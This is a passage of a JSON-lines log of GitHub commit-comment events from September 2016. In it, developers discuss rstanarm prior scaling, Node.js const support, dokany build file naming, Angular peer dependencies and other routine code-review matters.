>\n> > > On Tue, Sep 27, 2016 at 2:43 PM, bgoodri <notifications@github.com>\n> > wrote:\n> > >\n> > > > Should say that scaled is ignored if QR = TRUE.\n> > > >\n> > > > —\n> > > > You are receiving this because you authored the thread.\n> > > > Reply to this email directly, view it on GitHub\n> > > > <https://github.com/stan-dev/rstanarm/commit/\n> > > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19195943>,\n> > > > or mute the thread\n> > > > <https://github.com/notifications/unsubscribe-auth/AHb4Q-\n> > > 8AYy5Nc4jcMymlNejeMEr0mlixks5quWO_gaJpZM4KIA1X>\n> > > > .\n> > > >\n> > >\n> > > —\n> > > You are receiving this because you were mentioned.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/stan-dev/rstanarm/commit/\n> > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196040>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/ADOrqgZ5-\n> > lY5ADL9dZhpUoekOutl7yyHks5quWUTgaJpZM4KIA1X>\n> >\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/stan-dev/rstanarm/commit/\n> d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196091>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AHb4Q-4d65utKNB-\n> gMGY1GmXEvGj-I8sks5quWW3gaJpZM4KIA1X>\n> > .\n> >\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stan-dev/rstanarm/commit/d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196222>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADOrqm8yysPpnQdGRTY5S9ThgROeZt6uks5quWemgaJpZM4KIA1X>\n> .\n>\n"}},"created_at":"2016-09-27T19:05:30Z"}
{"id":"4626282831","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19196324,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T19:05:46Z","updated_at":"2016-09-27T19:05:46Z","body":"Exact 😄 ! I forgot to change in appveyor in the same time we moved to changelog.md 😢 \r\nFixed with https://github.com/dokan-dev/dokany/commit/66f8927e9bbbdd8c8ea56422219b8bb2fd43fc86\r\n\r\nhttps://ci.appveyor.com/project/Maxhy/dokany/build/1.0.1-779/job/i6uyb59m3eg6vbv7/artifacts 👍 "}},"created_at":"2016-09-27T19:05:46Z"}
{"id":"4626283569","type":"CommitCommentEvent","actor":{"login":"mzhurovich"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19196330,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T19:05:54Z","updated_at":"2016-09-27T19:05:54Z","body":"I'm not an expert, just read that `const` may have some performance issues.\r\nIf it's not true, I may replace it."}},"created_at":"2016-09-27T19:05:54Z"}
{"id":"4626287139","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19196336,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T19:06:33Z","updated_at":"2016-09-27T19:06:33Z","body":"The reason I didn't use `const` is simple: older versions of `node` won't support it."}},"created_at":"2016-09-27T19:06:33Z"}
{"id":"4626287612","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"stopstalk/stopstalk-deployment"},"payload":{"comment":{"id":19196338,"position":null,"line":null,"path":null,"commit_id":"76849d27e5924cb5962f2d620f8b97140e98cabf","created_at":"2016-09-27T19:06:38Z","updated_at":"2016-09-27T19:06:38Z","body":"Issue #73 "}},"created_at":"2016-09-27T19:06:38Z"}
{"id":"4626290140","type":"CommitCommentEvent","actor":{"login":"linhphi9x94"},"repo":{"name":"BlurOS/android_device_pantech_ef63l"},"payload":{"comment":{"id":19196347,"position":null,"line":null,"path":null,"commit_id":"e459e44ed432c4b1ac152e5ec426da9a599defe4","created_at":"2016-09-27T19:07:06Z","updated_at":"2016-09-27T19:07:06Z","body":"Yes. I think too ;)"}},"created_at":"2016-09-27T19:07:06Z"}
{"id":"4626293073","type":"CommitCommentEvent","actor":{"login":"DresKeller"},"repo":{"name":"DresKeller/ProgrammingAssignment2"},"payload":{"comment":{"id":19196351,"position":null,"line":null,"path":null,"commit_id":"9538ca70dad6487fd9c845aa20027f5df64e3178","created_at":"2016-09-27T19:07:37Z","updated_at":"2016-09-27T19:07:37Z","body":"erneuter Versuch"}},"created_at":"2016-09-27T19:07:37Z"}
{"id":"4626295186","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19196355,"position":null,"line":null,"path":null,"commit_id":"8e27dad5c9d3cfd72fdac6733b48b310e8dea506","created_at":"2016-09-27T19:08:00Z","updated_at":"2016-09-27T19:08:00Z","body":"license-update (axelstudios) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-27T19:08:00Z"}
{"id":"4626298376","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19196361,"position":null,"line":null,"path":null,"commit_id":"817cdbbf850a7be10f85841b118f1b4feb5177b9","created_at":"2016-09-27T19:08:35Z","updated_at":"2016-09-27T19:08:35Z","body":"Thanks @mstembera ! Actually the cleaned up version I already committed has SCORE_ZERO :)"}},"created_at":"2016-09-27T19:08:35Z"}
{"id":"4626298936","type":"CommitCommentEvent","actor":{"login":"slorion"},"repo":{"name":"slorion/nlight"},"payload":{"comment":{"id":19196362,"position":null,"line":null,"path":null,"commit_id":"d4d49ac9dc9ba715defc1b0e663f0a0fa13cf5b3","created_at":"2016-09-27T19:08:41Z","updated_at":"2016-09-27T19:08:41Z","body":"Fixes #7 "}},"created_at":"2016-09-27T19:08:41Z"}
{"id":"4626299627","type":"CommitCommentEvent","actor":{"login":"rosatolen"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19196364,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-27T19:08:49Z","updated_at":"2016-09-27T19:08:49Z","body":"Why do we remove the header keys?"}},"created_at":"2016-09-27T19:08:49Z"}
{"id":"4626300355","type":"CommitCommentEvent","actor":{"login":"Skatox"},"repo":{"name":"Programacion2UNET/practica-1-luistorm"},"payload":{"comment":{"id":19196367,"position":null,"line":null,"path":null,"commit_id":"38319116560984047212a4be043135f5e2bac55d","created_at":"2016-09-27T19:08:57Z","updated_at":"2016-09-27T19:08:57Z","body":"Interesante forma de resolverlo. Para la próxima, le recomiendo colocar el archivo README.md en vez del Leeme.txt porque es mas universal."}},"created_at":"2016-09-27T19:08:57Z"}
{"id":"4626302893","type":"CommitCommentEvent","actor":{"login":"sockrhe"},"repo":{"name":"sockrhe/practica1"},"payload":{"comment":{"id":19196374,"position":6,"line":6,"path":"proyecto.php","commit_id":"4ee8eeca8a0bc56c59adc2dbb267387f6e739162","created_at":"2016-09-27T19:09:27Z","updated_at":"2016-09-27T19:09:27Z","body":"j\r\n"}},"created_at":"2016-09-27T19:09:27Z"}
{"id":"4626305483","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196380,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:09:55Z","updated_at":"2016-09-27T19:09:55Z","body":"test comment"}},"created_at":"2016-09-27T19:09:55Z"}
{"id":"4626306077","type":"CommitCommentEvent","actor":{"login":"eddiepiazza"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19196383,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-27T19:10:02Z","updated_at":"2016-09-27T19:10:02Z","body":"In every update of this module I get an MySQL error:\r\n\r\n`An internal server error occurred.Database Exception: SQLSTATE[HY000]: General error: 2006 MySQL server has gone away The SQL being executed was: SELECT `id` FROM `user_http_session` WHERE `id`='99ec5e0362debee82fce19c1fdc4cb27'`"}},"created_at":"2016-09-27T19:10:02Z"}
{"id":"4626307671","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196388,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:10:19Z","updated_at":"2016-09-27T19:10:19Z","body":":+1: "}},"created_at":"2016-09-27T19:10:19Z"}
{"id":"4626308232","type":"CommitCommentEvent","actor":{"login":"cben"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19196390,"position":5,"line":0,"path":"app/controllers/ems_common.rb","commit_id":"e6c9e1a8d5bef4d0525fec8d5b3ddb1a107e957f","created_at":"2016-09-27T19:10:25Z","updated_at":"2016-09-27T19:10:25Z","body":"actually can't say off hand if it's necessary, it's possible that the translation of \"Container groups\"is already \"Pods\"."}},"created_at":"2016-09-27T19:10:25Z"}
{"id":"4626308340","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196392,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:10:26Z","updated_at":"2016-09-27T19:10:26Z","body":":ship: "}},"created_at":"2016-09-27T19:10:26Z"}
{"id":"4626309352","type":"CommitCommentEvent","actor":{"login":"bodohlah"},"repo":{"name":"IsabelleFollador/maxi-challenge"},"payload":{"comment":{"id":19196395,"position":null,"line":null,"path":null,"commit_id":"47878c04f0061731ff51236a45de99e4a57cc328","created_at":"2016-09-27T19:10:38Z","updated_at":"2016-09-27T19:10:38Z","body":"pas mal\r\n"}},"created_at":"2016-09-27T19:10:38Z"}
{"id":"4626309774","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19196399,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T19:10:43Z","updated_at":"2016-09-27T19:10:43Z","body":"Right, and I see the supposed utility of doing it for that reason, but\nit worries me that people will report in papers that they used whatever\nprior they set via the \"prior\" argument when that's not the prior that gets\nused under the hood.\n\nOn Tuesday, September 27, 2016, bgoodri <notifications@github.com> wrote:\n\n> Dirty as in it contravenes Bayes Theorem but that doesn't bother Andrew too\n> much. In practice, the average rstanarm user is going to get results closer\n> to what Bayes Theorem implies with it than without it because too many of\n> them use ridiculous units for the outcome.\n>\n> On Tue, Sep 27, 2016 at 2:59 PM, Jonah Gabry <notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>>\n> wrote:\n>\n> > Dirty as in too data dependent? Why are we doing it at all?\n> >\n> > On Tue, Sep 27, 2016 at 2:51 PM, bgoodri <notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>> wrote:\n> >\n> > > Yeah, although that is dirty\n> > >\n> > > On Tue, Sep 27, 2016 at 2:48 PM, Jonah Gabry <notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>>\n> > > wrote:\n> > >\n> > > > Only part of scaled is ignored. From the code in stan_glm.fit it\n> looks\n> > > like\n> > > > we still do the 2*sd(y) stuff if scaled=TRUE and QR=TRUE. So it's\n> only\n> > > the\n> > > > stuff with x that is ignored if QR=TRUE.\n> > > >\n> > > > On Tue, Sep 27, 2016 at 2:43 PM, bgoodri <notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>>\n> > > wrote:\n> > > >\n> > > > > Should say that scaled is ignored if QR = TRUE.\n> > > > >\n> > > > > —\n> > > > > You are receiving this because you authored the thread.\n> > > > > Reply to this email directly, view it on GitHub\n> > > > > <https://github.com/stan-dev/rstanarm/commit/\n> > > > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19195943>,\n> > > > > or mute the thread\n> > > > > <https://github.com/notifications/unsubscribe-auth/AHb4Q-\n> > > > 8AYy5Nc4jcMymlNejeMEr0mlixks5quWO_gaJpZM4KIA1X>\n> > > > > .\n> > > > >\n> > > >\n> > > > —\n> > > > You are receiving this because you were mentioned.\n> > > > Reply to this email directly, view it on GitHub\n> > > > <https://github.com/stan-dev/rstanarm/commit/\n> > > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196040>,\n> > > > or mute the thread\n> > > > <https://github.com/notifications/unsubscribe-auth/ADOrqgZ5-\n> > > lY5ADL9dZhpUoekOutl7yyHks5quWUTgaJpZM4KIA1X>\n> > >\n> > > > .\n> > > >\n> > >\n> > > —\n> > > You are receiving this because you authored the thread.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/stan-dev/rstanarm/commit/\n> > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196091>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/AHb4Q-4d65utKNB-\n> > gMGY1GmXEvGj-I8sks5quWW3gaJpZM4KIA1X>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/stan-dev/rstanarm/commit/\n> d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196222>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ADOrqm8yysPpnQdGRTY5S9ThgROeZt6uks5quWemgaJpZM4KIA1X>\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stan-dev/rstanarm/commit/d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196321>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHb4Q40tPCfLGSHu7Qb3y1jhgQLPmUasks5quWj8gaJpZM4KIA1X>\n> .\n>\n"}},"created_at":"2016-09-27T19:10:43Z"}
{"id":"4626311134","type":"CommitCommentEvent","actor":{"login":"mzhurovich"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19196403,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T19:10:59Z","updated_at":"2016-09-27T19:10:59Z","body":"@dkorolev This whole Node shit is about being always up-to-date, no?"}},"created_at":"2016-09-27T19:10:59Z"}
{"id":"4626311224","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196404,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:11:00Z","updated_at":"2016-09-27T19:11:00Z","body":"muhahahaa.. got my first project on GitHub"}},"created_at":"2016-09-27T19:11:00Z"}
{"id":"4626311825","type":"CommitCommentEvent","actor":{"login":"actuallymentor"},"repo":{"name":"actuallymentor/Setup-Script-Nginx-Pagespeed-PHP7-Mariadb"},"payload":{"comment":{"id":19196405,"position":12,"line":12,"path":"setup.sh","commit_id":"c2ed6c834398a5a209117419c287b5d5baa653a2","created_at":"2016-09-27T19:11:07Z","updated_at":"2016-09-27T19:11:07Z","body":"Thanks for the link! I had some issues when I didn't explicitly specify them. I'll do some testing to see where that goes wrong..."}},"created_at":"2016-09-27T19:11:07Z"}
{"id":"4626312480","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196408,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:11:15Z","updated_at":"2016-09-27T19:11:15Z","body":"# Prothom Jibon"}},"created_at":"2016-09-27T19:11:15Z"}
{"id":"4626312535","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19196409,"position":13,"line":13,"path":".travis.yml","commit_id":"0266b118072c29b9d2cffbba3aa57eb83facdb1f","created_at":"2016-09-27T19:11:15Z","updated_at":"2016-09-27T19:11:15Z","body":"Interesting - have never used this before..."}},"created_at":"2016-09-27T19:11:15Z"}
{"id":"4626312760","type":"CommitCommentEvent","actor":{"login":"eddiepiazza"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19196412,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-27T19:11:18Z","updated_at":"2016-09-27T19:11:18Z","body":"Is it possible to change the URL name `custom_pages` to an other name?"}},"created_at":"2016-09-27T19:11:18Z"}
{"id":"4626313866","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196414,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:11:30Z","updated_at":"2016-09-27T19:11:30Z","body":"**Dui Nayan**"}},"created_at":"2016-09-27T19:11:30Z"}
{"id":"4626313925","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19196415,"position":17,"line":17,"path":".travis.yml","commit_id":"0266b118072c29b9d2cffbba3aa57eb83facdb1f","created_at":"2016-09-27T19:11:31Z","updated_at":"2016-09-27T19:11:31Z","body":"👍 "}},"created_at":"2016-09-27T19:11:31Z"}
{"id":"4626314652","type":"CommitCommentEvent","actor":{"login":"fbobbio"},"repo":{"name":"neroniaky/angular2-token"},"payload":{"comment":{"id":19196418,"position":null,"line":null,"path":null,"commit_id":"709d27e665b9a82357810a12aceb1a08b4ac8fef","created_at":"2016-09-27T19:11:39Z","updated_at":"2016-09-27T19:11:39Z","body":"Hi there @neroniaky \r\n\r\nI would like to ask you about this upgrade to a non stable version of angular and dependencies (2.0.1) instead of pointing to the final release of angular.\r\n\r\nCurrently my project uses the final release in I'm getting warnings while running **npm install**:\r\n\r\n```\r\nnpm WARN angular2-token@0.1.13 requires a peer of @angular/core@2.0.1 but none was installed.\r\nnpm WARN angular2-token@0.1.13 requires a peer of @angular/http@2.0.1 but none was installed.\r\nnpm WARN angular2-token@0.1.13 requires a peer of @angular/common@2.0.1 but none was installed.\r\nnpm WARN angular2-token@0.1.13 requires a peer of @angular/router@3.0.1 but none was installed.\r\n\r\n```\r\n\r\nWouldn't be a expected behavior to point to the final release of ng2 and its correspondant dependencies?\r\n\r\nThanks!"}},"created_at":"2016-09-27T19:11:39Z"}
{"id":"4626315283","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196423,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:11:45Z","updated_at":"2016-09-27T19:11:45Z","body":"_HelloItalic_"}},"created_at":"2016-09-27T19:11:45Z"}
{"id":"4626316445","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196429,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:11:58Z","updated_at":"2016-09-27T19:11:58Z","body":"> just quoting<"}},"created_at":"2016-09-27T19:11:58Z"}
{"id":"4626317244","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196436,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:12:07Z","updated_at":"2016-09-27T19:12:07Z","body":"`hello`"}},"created_at":"2016-09-27T19:12:07Z"}
{"id":"4626318523","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196438,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:12:21Z","updated_at":"2016-09-27T19:12:21Z","body":"[www.yahoo.com](url)"}},"created_at":"2016-09-27T19:12:21Z"}
{"id":"4626318530","type":"CommitCommentEvent","actor":{"login":"daonlydagger"},"repo":{"name":"Lewisu-cpsc36000/la-git"},"payload":{"comment":{"id":19196439,"position":3,"line":5,"path":"suv.txt","commit_id":"85c2de263ce5a04e05a0d71fc6640932dd692a40","created_at":"2016-09-27T19:12:21Z","updated_at":"2016-09-27T19:12:21Z","body":"cani i comment?"}},"created_at":"2016-09-27T19:12:21Z"}
{"id":"4626319436","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196440,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:12:32Z","updated_at":"2016-09-27T19:12:32Z","body":"- Bullet Point\r\n"}},"created_at":"2016-09-27T19:12:32Z"}
{"id":"4626319573","type":"CommitCommentEvent","actor":{"login":"lexmag"},"repo":{"name":"lexmag/elixir"},"payload":{"comment":{"id":19196441,"position":13,"line":1249,"path":"lib/elixir/lib/kernel.ex","commit_id":"bb27ff195cb05c1abebac44e561a3e26fd42818b","created_at":"2016-09-27T19:12:33Z","updated_at":"2016-09-27T19:12:33Z","body":"@josevalim this arrow (`->`) needs to be `generated: true` otherwise we get \"this clause cannot match because a previous clause always matches\", but I think we end up with the same issue as here: https://github.com/elixir-lang/elixir/commit/93ca080bb9b5a1e094885fb81fea6ee04f9260f1.\r\nWhat do you think?"}},"created_at":"2016-09-27T19:12:33Z"}
{"id":"4626320215","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196442,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:12:42Z","updated_at":"2016-09-27T19:12:42Z","body":"1. Numbered number."}},"created_at":"2016-09-27T19:12:42Z"}
{"id":"4626321291","type":"CommitCommentEvent","actor":{"login":"EmtiazB"},"repo":{"name":"EmtiazB/MyFirstProject"},"payload":{"comment":{"id":19196447,"position":null,"line":null,"path":null,"commit_id":"d2111290d9d4dcc238138dad5f5742a46de968c2","created_at":"2016-09-27T19:12:53Z","updated_at":"2016-09-27T19:12:53Z","body":"- [ ] Bujha jasche na "}},"created_at":"2016-09-27T19:12:53Z"}
{"id":"4626326827","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19196472,"position":null,"line":null,"path":null,"commit_id":"8e27dad5c9d3cfd72fdac6733b48b310e8dea506","created_at":"2016-09-27T19:13:54Z","updated_at":"2016-09-27T19:13:54Z","body":"license-update (axelstudios) - i386-Windows-7-VisualStudio-12: OK (2405 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.24%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T19:13:54Z"}
{"id":"4626327532","type":"CommitCommentEvent","actor":{"login":"portercd"},"repo":{"name":"Vandy-DH-Center/blog"},"payload":{"comment":{"id":19196474,"position":6,"line":5,"path":"pretend-post.md","commit_id":"2d7e2178f426bb1d8d19bbd78bcb9a6969725e84","created_at":"2016-09-27T19:14:03Z","updated_at":"2016-09-27T19:14:03Z","body":"Even if it isn't that *neat* it is pretty *cool*"}},"created_at":"2016-09-27T19:14:03Z"}
{"id":"4626327783","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"php-build/php-build"},"payload":{"comment":{"id":19196475,"position":null,"line":null,"path":null,"commit_id":"ee8b8b7173607c6e491425e39f106aecab339e37","created_at":"2016-09-27T19:14:05Z","updated_at":"2016-09-27T19:14:05Z","body":"Xdebug doesn't support PHP 7.1, nor does it actually compile."}},"created_at":"2016-09-27T19:14:05Z"}
{"id":"4626328382","type":"CommitCommentEvent","actor":{"login":"SideMasterGM"},"repo":{"name":"SideMasterGM/InterCloud"},"payload":{"comment":{"id":19196476,"position":null,"line":null,"path":null,"commit_id":"0a509c54c4b1e28abf0d958b0874da642c69b652","created_at":"2016-09-27T19:14:11Z","updated_at":"2016-09-27T19:14:11Z","body":"Excellent."}},"created_at":"2016-09-27T19:14:11Z"}
{"id":"4626328968","type":"CommitCommentEvent","actor":{"login":"georgetillett"},"repo":{"name":"georgetillett/SNOWInt"},"payload":{"comment":{"id":19196477,"position":4,"line":7,"path":"Web.config","commit_id":"1ae236e13ae27d1c50653612659493500270845e","created_at":"2016-09-27T19:14:19Z","updated_at":"2016-09-27T19:14:19Z","body":"This is a comment on the change to the web.config file"}},"created_at":"2016-09-27T19:14:19Z"}
{"id":"4626329838","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"ycho/aom"},"payload":{"comment":{"id":19196478,"position":5,"line":1859,"path":"av1/encoder/rdopt.c","commit_id":"a7b5f659b5750173a0bf70e816a775a4ca047eaf","created_at":"2016-09-27T19:14:28Z","updated_at":"2016-09-27T19:14:28Z","body":"oh- I haven't really thought about that far, but sure I will check whether\nwhat you say makes sense. Thx for comment.\n\nOn Tue, Sep 27, 2016 at 10:22 AM, Guillaume Martres <\nnotifications@github.com> wrote:\n\n> If you multiply *distortion by some factor, you should also multiply *sse\n> by the same factor if you don't want uv skip to be picked more often\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ycho/aom/commit/a7b5f659b5750173a0bf70e816a775a4ca047eaf#commitcomment-19194446>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJp3-wia-AHyw5AWHY2nGJWZGT6w8hgJks5quVDKgaJpZM4KH7sD>\n> .\n>\n\n\n\n-- \nThanks!\nYushin\n"}},"created_at":"2016-09-27T19:14:28Z"}
{"id":"4626331450","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19196482,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T19:14:46Z","updated_at":"2016-09-27T19:14:46Z","body":"As usually, your reviews are extremely helpful. Thanks.\r\nI hope now it's completely fixed."}},"created_at":"2016-09-27T19:14:46Z"}
{"id":"4626331961","type":"CommitCommentEvent","actor":{"login":"netblue30"},"repo":{"name":"manevich/firejail"},"payload":{"comment":{"id":19196483,"position":null,"line":null,"path":null,"commit_id":"b65b1c8b35e1cf29012c7028da43adad1c1e2b58","created_at":"2016-09-27T19:14:52Z","updated_at":"2016-09-27T19:14:52Z","body":"Yes, it is a valid one. I just added the signal handler, replaced ctflush with the regular flush_stdin()."}},"created_at":"2016-09-27T19:14:52Z"}
{"id":"4626334189","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19196487,"position":null,"line":null,"path":null,"commit_id":"373df5796bb2842760467b98632cceebd62646c7","created_at":"2016-09-27T19:15:16Z","updated_at":"2016-09-27T19:15:16Z","body":"++"}},"created_at":"2016-09-27T19:15:16Z"}
{"id":"4626341597","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19196503,"position":null,"line":null,"path":null,"commit_id":"06bc5cc2b2e5ee72750b569e48f22425655ba60f","created_at":"2016-09-27T19:16:40Z","updated_at":"2016-09-27T19:16:40Z","body":"Wait wat, how am I not in team"}},"created_at":"2016-09-27T19:16:40Z"}
{"id":"4626344379","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19196507,"position":null,"line":null,"path":null,"commit_id":"3361dbf7e681d45d71753b2931967e0bd700e492","created_at":"2016-09-27T19:17:10Z","updated_at":"2016-09-27T19:17:10Z","body":"Now the filename is DokanSetup-1.0.1.5779.exe. Should it not be DokanSetup-1.0.1.1.exe `1.0.0.(0 + build number)`?"}},"created_at":"2016-09-27T19:17:10Z"}
